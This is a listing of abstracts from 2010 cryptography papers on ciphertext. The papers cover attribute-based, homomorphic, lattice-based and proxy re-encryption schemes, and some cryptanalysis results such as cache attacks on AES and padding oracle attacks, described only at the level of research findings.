Showing papers on "Ciphertext published in 2010"

Boolean Models and Methods in Mathematics, Computer Science, and Engineering: Boolean Functions for Cryptography and Error-Correcting Codes

Abstract: Introduction A fundamental objective of cryptography is to enable two persons to communicate over an insecure channel (a public channel such as the internet) in such a way that any other person is unable to recover their message (called the plaintext ) from what is sent in its place over the channel (the ciphertext ). The transformation of the plaintext into the ciphertext is called encryption , or enciphering. Encryption-decryption is the most ancient cryptographic activity (ciphers already existed four centuries b.c.), but its nature has deeply changed with the invention of computers, because the cryptanalysis (the activity of the third person, the eavesdropper, who aims at recovering the message) can use their power. The encryption algorithm takes as input the plaintext and an encryption key K E , and it outputs the ciphertext. If the encryption key is secret, then we speak of conventional cryptography , of private key cryptography , or of symmetric cryptography . In practice, the principle of conventional cryptography relies on the sharing of a private key between the sender of a message (often called Alice in cryptography) and its receiver (often called Bob). If, on the contrary, the encryption key is public, then we speak of public key cryptography . Public key cryptography appeared in the literature in the late 1970s.

Decentralizing Attribute-Based Encryption.

Abstract: We propose a Multi-Authority Attribute-Based Encryption (ABE) system. In our system, any party can become an authority and there is no requirement for any global coordination other than the creation of an initial set of common reference parameters. A party can simply act as an ABE authority by creating a public key and issuing private keys to different users that reflect their attributes. A user can encrypt data in terms of any boolean formula over attributes issued from any chosen set of authorities. Finally, our system does not require any central authority. In constructing our system, our largest technical hurdle is to make it collusion resistant. Prior Attribute-Based Encryption systems achieved collusion resistance when the ABE system authority “tied” together different components (representing different attributes) of a user’s private key by randomizing the key. However, in our system each component will come from a potentially different authority, where we assume no coordination between such authorities. We create new techniques to tie key components together and prevent collusion attacks between users with different global identifiers. We prove our system secure using the recent dual system encryption methodology where the security proof works by first converting the challenge ciphertext and private keys to a semi-functional form and then arguing security. We follow a recent variant of the dual system proof technique due to Lewko and Waters and build our system using bilinear groups of composite order. We prove security under similar static assumptions to the LW paper in the random oracle model.

Fully homomorphic encryption with relatively small key and ciphertext sizes

Abstract: We present a fully homomorphic encryption scheme which has both relatively small key and ciphertext size Our construction follows that of Gentry by producing a fully homomorphic scheme from a “somewhat” homomorphic scheme For the somewhat homomorphic scheme the public and private keys consist of two large integers (one of which is shared by both the public and private key) and the ciphertext consists of one large integer As such, our scheme has smaller message expansion and key size than Gentry’s original scheme In addition, our proposal allows efficient fully homomorphic encryption over any field of characteristic two

Attribute based data sharing with attribute revocation

Abstract: Ciphertext-Policy Attribute Based Encryption (CP-ABE) is a promising cryptographic primitive for fine-grained access control of shared data. In CP-ABE, each user is associated with a set of attributes and data are encrypted with access structures on attributes. A user is able to decrypt a ciphertext if and only if his attributes satisfy the ciphertext access structure. Beside this basic property, practical applications usually have other requirements. In this paper we focus on an important issue of attribute revocation which is cumbersome for CP-ABE schemes. In particular, we resolve this challenging issue by considering more practical scenarios in which semi-trustable on-line proxy servers are available. As compared to existing schemes, our proposed solution enables the authority to revoke user attributes with minimal effort. We achieve this by uniquely integrating the technique of proxy re-encryption with CP-ABE, and enable the authority to delegate most of laborious tasks to proxy servers. Formal analysis shows that our proposed scheme is provably secure against chosen ciphertext attacks. In addition, we show that our technique can also be applicable to the Key-Policy Attribute Based Encryption (KP-ABE) counterpart.

Asymmetric cryptosystem based on phase-truncated Fourier transforms.

Abstract: We propose an asymmetric cryptosystem based on a phase-truncated Fourier transform. With phase truncation in Fourier transform, one is able to produce an asymmetric ciphertext as real-valued and stationary white noise by using two random phase keys as public keys, while a legal user can retrieve the plaintext using another two different private phase keys in the decryption process. Owing to the nonlinear operation of phase truncation, high robustness against existing attacks could be achieved. A set of simulation results shows the validity of proposed asymmetric cryptosystem.

Lattice basis delegation in fixed dimension and shorter-ciphertext hierarchical IBE

Abstract: We present a technique for delegating a short lattice basis that has the advantage of keeping the lattice dimension unchanged upon delegation. Building on this result, we construct two new hierarchical identity-based encryption (HIBE) schemes, with and without random oracles. The resulting systems are very different from earlier lattice-based HIBEs and in some cases result in shorter ciphertexts and private keys. We prove security from classic lattice hardness assumptions.

Cache Games - Bringing Access Based Cache Attacks on AES to Practice.

Abstract: Side channel attacks on cryptographic systems are attacks exploiting information gained from physical implementations rather than utilizing theoretical weaknesses of a scheme. In particular, during the last years, major achievements were made for the class of access-driven cache-attacks. The source of information leakage for such attacks are the locations of memory accesses performed by a victim process. In this paper we analyze the case of AES and present an attack which is capable of recovering the full secret key in almost realtime for AES-128, requiring only a very limited number of observed encryptions. Unlike most other attacks, ours neither needs to know the ciphertext, nor does it need to know any information about the plaintext (such as its distribution, etc.). Moreover, for the first time we also show how the plaintext can be recovered without having access to the ciphertext. Further, our spy process can be run under an unprivileged user account. It is the first working attack for implementations using compressed tables, where it is not possible to find out the beginning of AES rounds any more – a corner stone for all efficient previous attacks. All results of our attack have been demonstrated by a fully working implementation, and do not solely rely on theoretical considerations or simulations. A contribution of probably independent interest is a denial of service attack on the scheduler of current Linux systems (CFS), which allows to monitor memory accesses with novelly high precision. Finally, we give some generalizations of our attack, and suggest some possible countermeasures which would render our attack impossible. Keywords-AES; side channel; access-based cache-attacks;

Efficient unidirectional proxy re-encryption

Abstract: Proxy re-encryption (PRE) allows a semi-trusted proxy to convert a ciphertext originally intended for Alice into one encrypting the same plaintext for Bob. The proxy only needs a re-encryption key given by Alice, and cannot learn anything about the plaintext encrypted. This adds flexibility in various applications, such as confidential email, digital right management and distributed storage. In this paper, we study unidirectional PRE, which the re-encryption key only enables delegation in one direction but not the opposite. In PKC 2009, Shao and Cao proposed a unidirectional PRE assuming the random oracle. However, we show that it is vulnerable to chosen-ciphertext attack (CCA). We then propose an efficient unidirectional PRE scheme (without resorting to pairings). We gain high efficiency and CCA-security using the “token-controlled encryption” technique, under the computational Diffie-Hellman assumption, in the random oracle model and a relaxed but reasonable definition.

Revocation Systems with Very Small Private Keys

Abstract: In this work, we design a method for creating public key broadcast encryption systems. Our main technical innovation is based on a new "two equation" technique for revoking users. This technique results in two key contributions: First, our new scheme has ciphertext size overhead $O(r)$, where $r$ is the number of revoked users, and the size of public and private keys is only a \emph{constant} number of group elements from an elliptic-curve group of prime order. In addition, the public key allows us to encrypt to an unbounded number of users. Our system is the first to achieve such parameters. We give two versions of our scheme: a simpler version which we prove to be selectively secure in the standard model under a new, but non-interactive assumption, and another version that employs the new dual system encryption technique of Waters to obtain adaptive security under the d-BDH and decisional Linear assumptions. Second, we show that our techniques can be used to realize Attribute-Based Encryption (ABE) systems with non-monotonic access formulas, where our key storage is significantly more efficient than previous solutions. This result is also proven selectively secure in the standard model under our new non-interactive assumption.

A generalization of Paillier’s public-key system with applications to electronic voting

Abstract: We propose a generalization of Paillier’s probabilistic public-key system, in which the expansion factor is reduced and which allows to adjust the block length of the scheme even after the public key has been fixed, without losing the homomorphic property. We show that the generalization is as secure as Paillier’s original system and propose several ways to optimize implementations of both the generalized and the original scheme. We construct a threshold variant of the generalized scheme as well as zero-knowledge protocols to show that a given ciphertext encrypts one of a set of given plaintexts, and protocols to verify multiplicative relations on plaintexts. We then show how these building blocks can be used for applying the scheme to efficient electronic voting. This reduces dramatically the work needed to compute the final result of an election, compared to the previously best known schemes. We show how the basic scheme for a yes/no vote can be easily adapted to casting a vote for up to t out of L candidates. The same basic building blocks can also be adapted to provide receipt-free elections, under appropriate physical assumptions. The scheme for 1 out of L elections can be optimized such that for a certain range of the other parameter values, the ballot size is logarithmic in L.

Robust encryption

Abstract: We provide a provable-security treatment of “robust” encryption. Robustness means it is hard to produce a ciphertext that is valid for two different users. Robustness makes explicit a property that has been implicitly assumed in the past. We argue that it is an essential conjunct of anonymous encryption. We show that natural anonymity-preserving ways to achieve it, such as adding recipient identification information before encrypting, fail. We provide transforms that do achieve it, efficiently and provably. We assess the robustness of specific encryption schemes in the literature, providing simple patches for some that lack the property. We present various applications. Our work enables safer and simpler use of encryption.

Improved Single-Key Attacks on 8-Round AES-192 and AES-256

Abstract: AES is the most widely used block cipher today, and its security is one of the most important issues in cryptanalysis. After 13 years of analysis, related-key attacks were recently found against two of its flavors (AES-192 and AES-256). However, such a strong type of attack is not universally accepted as a valid attack model, and in the more standard single-key attack model at most 8 rounds of these two versions can be currently attacked. In the case of 8-round AES-192, the only known attack (found 10 years ago) is extremely marginal, requiring the evaluation of essentially all the 2128 possible plaintext/ciphertext pairs in order to speed up exhaustive key search by a factor of 16. In this paper we introduce three new cryptanalytic techniques, and use them to get the first non-marginal attack on 8-round AES-192 (making its time complexity about a million times faster than exhaustive search, and reducing its data complexity to about 1/32,000 of the full codebook). In addition, our new techniques can reduce the best known time complexities for all the other combinations of 7-round and 8-round AES-192 and AES-256.

Anonymous Multireceiver Identity-Based Encryption

Abstract: Recently, many multireceiver identity-based encryption schemes have been proposed in the literature. However, none can protect the privacy of message receivers among these schemes. In this paper, we present an anonymous multireceiver identity-based encryption scheme where we adopt Lagrange interpolating polynomial mechanisms to cope with the above problem. Our scheme makes it impossible for an attacker or any other message receiver to derive the identity of a message receiver such that the privacy of every receiver can be guaranteed. Furthermore, the proposed scheme is quite receiver efficient since each of the receivers merely needs to perform twice of pairing computation to decrypt the received ciphertext. We prove that our scheme is secure against adaptive chosen plaintext attacks and adaptive chosen ciphertext attacks. Finally, we also formally show that every receiver in the proposed scheme is anonymous to any other receiver.

A ciphertext-policy attribute-based encryption scheme with constant ciphertext length

Abstract: An Attribute-Based Encryption (ABE) is an encryption scheme where users with some attributes can decrypt ciphertexts associated with these attributes. The length of the ciphertext depends on the number of attributes in previous ABE schemes. In this paper, we propose a new Ciphertext-Policy Attribute-Based Encryption (CP-ABE) with constant ciphertext length. In our scheme, the number of pairing computations is also constant. In addition, the number of additional bits required from chosen plaintext attack-secure CP-ABE to chosen ciphertext attack-secure CP-ABE is reduced by 90% with respect to that of the previous scheme.

Ciphertext policy attribute-based proxy re-encryption

Abstract: We present a novel ciphertext policy attribute-based proxy re-encryption (CP-AB-PRE) scheme. The ciphertext policy realized in our scheme is AND-gates policy supporting multi-value attributes, negative attributes and wildcards. Our scheme satisfies the properties of PRE, such as unidirectionality, non-interactivity and multi-use. Moreover, the proposed scheme has master key security, allows the encryptor to decide whether the ciphertext can be re-encrypted and allows the proxy to add access policy when re-encrypting ciphertext. Furthermore, our scheme can be modified to have constant ciphertext size in original encryption.

A 3-subset meet-in-the-middle attack: cryptanalysis of the lightweight block cipher KTANTAN

Abstract: In this paper we describe a variant of existing meet-in-the-middle attacks on block ciphers. As an application, we propose meetin-the-middle attacks that are applicable to the KTANTAN family of block ciphers accepting a key of 80 bits. The attacks are due to some weaknesses in its bitwise key schedule. We report an attack of time complexity 275.170 encryptions on the full KTANTAN32 cipher with only 3 plaintext/ciphertext pairs and well as 275.044 encryptions on the full KTANTAN48 and 275.584 encryptions on the full KTANTAN64 with 2 plaintext/ciphertext pairs. All these attacks work in the classical attack model without any related keys. In the differential related-key model, we demonstrate 218- and 174- round differentials holding with probability 1. This shows that a strong related-key property can translate to a successful attack in the nonrelated-key setting. Having extremely low data requirements, these attacks are valid even in RFID-like environments where only a very limited amount of text material may be available to an attacker.

Anonymity from asymmetry: new constructions for anonymous HIBE

Abstract: A Hierarchical Identity Based Encryption (HIBE) system is anonymous if the ciphertext reveals no information about the recipient's identity. create it. While there are multiple constructions for secure HIBE, far fewer constructions exist for anonymous HIBE. In this paper we show how to use asymmetric pairings to convert a large family of IBE and HIBE constructions into anonymous IBE and HIBE systems. We also obtain a delegatable-HVE which is a generalization of anonymous HIBE.

Building efficient fully collusion-resilient traitor tracing and revocation schemes

Abstract: In [8,9] Boneh et al. presented the first fully collusion-resistant traitor tracing and trace & revoke schemes. These schemes are based on composite order bilinear groups and their security depends on the hardness of the subgroup decision assumption.In this paper we present new, efficient trace & revoke schemes which are based on prime order bilinear groups, and whose security depend on the hardness of the Decisional Linear Assumption or the External Diffie-Hellman (XDH) assumption. This allows our schemes to be flexible and thus much more efficient than existing schemes in terms a variety of parameters including ciphertext size, encryption time, and decryption time.For example, if encryption time was the major parameter of concern, then for the same level of practical security as [8] our scheme encrypts 6 times faster. Decryption is 10 times faster. The ciphertext size in our scheme is 50% less when compared to [8].We provide the first implementations of efficient fully collusion-resilient traitor tracing and trace & revoke schemes. The ideas used in this paper can be used to make other cryptographic schemes based on composite order bilinear groups efficient as well

Encryption schemes secure against chosen-ciphertext selective opening attacks

Abstract: Imagine many small devices send data to a single receiver, encrypted using the receiver’s public key. Assume an adversary that has the power to adaptively corrupt a subset of these devices. Given the information obtained from these corruptions, do the ciphertexts from uncorrupted devices remain secure? Recent results suggest that conventional security notions for encryption schemes (like IND-CCA security) do not suffice in this setting. To fill this gap, the notion of security against selective-opening attacks (SOA security) has been introduced. It has been shown that lossy encryption implies SOA security against a passive, i.e., only eavesdropping and corrupting, adversary (SO-CPA). However, the known results on SOA security against an active adversary (SO-CCA) are rather limited. Namely, while there exist feasibility results, the (time and space) complexity of currently known SO-CCA secure schemes depends on the number of devices in the setting above. In this contribution, we devise a new solution to the selective opening problem that does not build on lossy encryption. Instead, we combine techniques from non-committing encryption and hash proof systems with a new technique (dubbed “cross-authentication codes”) to glue several ciphertext parts together. The result is a rather practical SO-CCA secure public-key encryption scheme that does not suffer from the efficiency drawbacks of known schemes. Since we build upon hash proof systems, our scheme can be instantiated using standard number-theoretic assumptions such as decisional Diffie-Hellman DDH), decisional composite residuosity (DCR), and quadratic residuosity (QR). Besides, we construct a conceptually very simple and comparatively efficient SO-CPA secure scheme from (slightly enhanced) trapdoor one-way permutations. We stress that our schemes are completely independent of the number of challenge ciphertexts, and we do not make assumptions about the underlying message distribution (beyond being efficiently samplable). In particular, we do not assume efficient conditional re-samplability of the message distribution. Hence, our schemes are secure in arbitrary settings, even if it is not known in advance how many ciphertexts might be considered for corruptions.

On Efficient Ciphertext-Policy Attribute Based Encryption and Broadcast Encryption.

Abstract: Ciphertext Policy Attribute Based Encryption (CP-ABE) enforces an expressive data access policy, which consists of a number of attributes connected by logical gates. Only those decryptors whose attributes satisfy the data access policy can decrypt the ciphertext. CP-ABE is very appealing since the ciphertext and data access policies are integrated together in a natural and effective way. However, all existing CP-ABE schemes incur very large ciphertext size, which increases linearly with respect to the number of attributes in the access policy. Large ciphertext prevents CP-ABE from being adopted in the communication constrained environments. In this paper, we proposed a new construction of CPABE, named Constant-size CP-ABE (denoted as CCP-ABE) that significantly reduces the ciphertext to a constant size for an AND gate access policy with any given number of attributes. Each ciphertext in CCP-ABE requires only 2 elements on a bilinear group. Based on CCP-ABE, we further proposed an Attribute Based Broadcast Encryption (ABBE) scheme. Compared to existing Broadcast Encryption (BE) schemes, ABBE is more flexible because a broadcasted message can be encrypted by an expressive access policy, either with or without explicit specifying the receivers. Moreover, ABBE significantly reduces the storage and communication overhead to the order of O(log N), where N is the system size. Also, we proved, using information theoretical approaches, ABBE attains minimal bound on storage overhead for each user to construct all possible subgroups in the communication system.

Threshold decryption and zero-knowledge proofs for lattice-based cryptosystems

Abstract: We present a variant of Regev’s cryptosystem first presented in [Reg05], but with a new choice of parameters. By a recent classical reduction by Peikert we prove the scheme semantically secure based on the worst-case lattice problem GapSVP. From this we construct a threshold cryptosystem which has a very efficient and non-interactive decryption protocol. We prove the threshold cryptosystem secure against passive adversaries corrupting all but one of the players, and againts active adversaries corrupting less than one third of the players. We also describe how one can build a distributed key generation protocol. In the final part of the paper we show how one can, in zero-knowledge - prove knowledge of the plaintext contained in a given ciphertext from Regev’s original cryptosystem or our variant. The proof is of size only a constant times the size of the public key.

On efficient ciphertext-policy attribute based encryption and broadcast encryption: extended abstract

Abstract: Existing CP-ABE schemes incur very large ciphertext size, which increases linearly with respect to the number of attributes in the access policy. Large ciphertext prevents CP-ABE from being adopted in the communication constrained environments. In this paper, we proposed a new construction of CP-ABE, named Constant-size CP-ABE (denoted as CCP-ABE) that significantly reduces the ciphertext to a constant size for an AND gate access policy with any given number of attributes. Each ciphertext in CCP-ABE requires only elements on a bilinear group.Based on CCP-ABE, we further proposed an Attribute Based Broadcast Encryption (ABBE) scheme. Compared to existing Broadcast Encryption (BE) schemes, ABBE is more flexible because a broadcasted message can be encrypted by an expressive access policy, either with or without explicit specifying the receivers. Moreover, ABBE significantly reduces the storage and communication overhead to the order of $O(\log N)$, where $N$ is the system size.

Efficient Homomorphic Encryption Scheme For Bilinear Forms

Abstract: In one exemplary embodiment, a computer readable storage medium tangibly embodying a program of instructions executable by a machine for performing operations including: receiving information B to be encrypted as a ciphertext C in accordance with an encryption scheme having an encrypt function; and encrypting B in accordance with the encrypt function to obtain C, the scheme utilizes at least one public key A, where B, C, and A are matrices, the encrypt function receives as inputs A and B and outputs C as C→AS+pX+B (mod q), S is a random matrix, X is an error matrix, p is in integer, q is an odd prime number. In other exemplary embodiments, the encryption scheme includes a decrypt function that receives as inputs at least one private key T (a matrix) and C and outputs B as B=T −1 ·(TCT t mod q)·(T t ) −1 mod p.

Integrated circuit, encryption communication apparatus, encryption communication system, information processing method and encryption communication method

Abstract: There is provided an integrated circuit includes an arithmetic circuit having input/output characteristics determined by element-specific physical characteristics; a storage unit having cipher text obtained by performing encryption processing on predetermined secret information using an output value output from the arithmetic circuit with respect to input of a predetermined value and the predetermined value input into the arithmetic circuit stored therein; and a decryption unit that restores the predetermined secret information by inputting the predetermined value stored in the storage unit into the arithmetic circuit and decrypting the cipher text stored in the storage unit using the output value output from the arithmetic circuit when the predetermined secret information is used.

Secure obfuscation for encrypted signatures

Abstract: Obfuscation is one of the most intriguing open problems in cryptography and only a few positive results are known. In TCC’07, Hohenberger et al. proposed an obfuscator for a re-encryption functionality, which takes a ciphertext for a message encrypted under Alice’s public key and transforms it into a ciphertext for the same message under Bob’s public key [24]. It is the first complicated cryptographic functionality that can be securely obfuscated, but obfuscators for such cryptographic functionalities are still elusive. In this paper, we consider obfuscation for encrypted signature (ES) functionalities, which generate a signature on a given message under Alice’s secret signing key and encrypt the signature under Bob’s public encryption key. We propose a special ES functionality, which is the sequential composition of Waters’s signature scheme [33] and the linear encryption scheme proposed by Boneh, Boyen, and Shacham [5], and construct a secure obfuscator for it. We follow the security argument by Hohenberger et al. to prove that our proposed obfuscator satisfies a virtual black-box property (VBP), which guarantees that the security of the signature scheme is preserved even when adversaries are given an obfuscated program. Our security argument is in the standard model.

Attribute-based authenticated key exchange

Abstract: We introduce the concept of attribute-based authenticated key exchange (AB-AKE) within the framework of ciphertext-policy attribute-based systems. A notion of AKE-security for AB-AKE is presented based on the security models for group key exchange protocols and also taking into account the security requirements generally considered in the ciphertext-policy attribute-based setting. We also introduce a new primitive called encapsulation policy attribute-based key encapsulation mechanism (EP-AB-KEM) and then define a notion of chosen ciphertext security for EP-AB-KEMs. A generic one-round AB-AKE protocol that satisfies our AKE-security notion is then presented. The protocol is generically constructed from any EP-AB-KEM that achieves chosen ciphertext security. Finally, we propose an EP-AB-KEM from an existing attribute-based encryption scheme and show that it achieves chosen ciphertext security in the generic group and random oracle models. Instantiating our AB-AKE protocol with this EP-AB-KEM will result in a concrete one-round AB-AKE protocol also secure in the generic group and random oracle models.

Practical padding oracle attacks

Abstract: At Eurocrypt 2002, Vaudenay introduced a powerful side-channel attack, which is called padding oracle attack, against CBC-mode encryption with PKCS#5 padding (See [6]). If there is an oracle which on receipt of a ciphertext, decrypts it and then replies to the sender whether the padding is correct or not, Vaudenay shows how to use that oracle to efficiently decrypt data without knowing the encryption key. In this paper, we turn the padding oracle attack into a new set of practical web hacking techniques. We also introduce a new technique that allows attackers to use a padding oracle to encrypt messages of any length without knowing the secret key. Finally, we show how to use that technique to mount advanced padding oracle exploits against popular web development frameworks.